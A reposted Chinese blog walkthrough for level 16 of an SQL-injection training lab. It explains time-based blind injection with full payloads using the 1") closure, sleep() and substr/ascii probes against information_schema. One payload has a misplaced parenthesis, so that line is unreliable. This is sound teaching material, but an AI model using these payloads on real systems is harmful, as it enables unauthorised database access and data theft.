当前位置: 首页> 游戏> 手游 > SQL 时间盲注 (injection 第十六关)

SQL 时间盲注 (injection 第十六关)

时间:2025/7/9 15:12:12来源:https://blog.csdn.net/baishiqi12/article/details/141298747 浏览次数:0次

简介


        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       

SQL注入的一个简要流程:


1、打开目标靶场

2、选择less - 16

3、确定网站可以注入的参数

本关可以直接在输入框中搜索 

4、判断闭合方式   

本关为 1") #

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如:   1") and if(length(database()=7),sleep(8),1) #

发现没有时间延迟,则数据库长度不为7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

  1") and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表


查询第一张表的第一个字符

1") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。

关键字:SQL 时间盲注 (injection 第十六关)

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: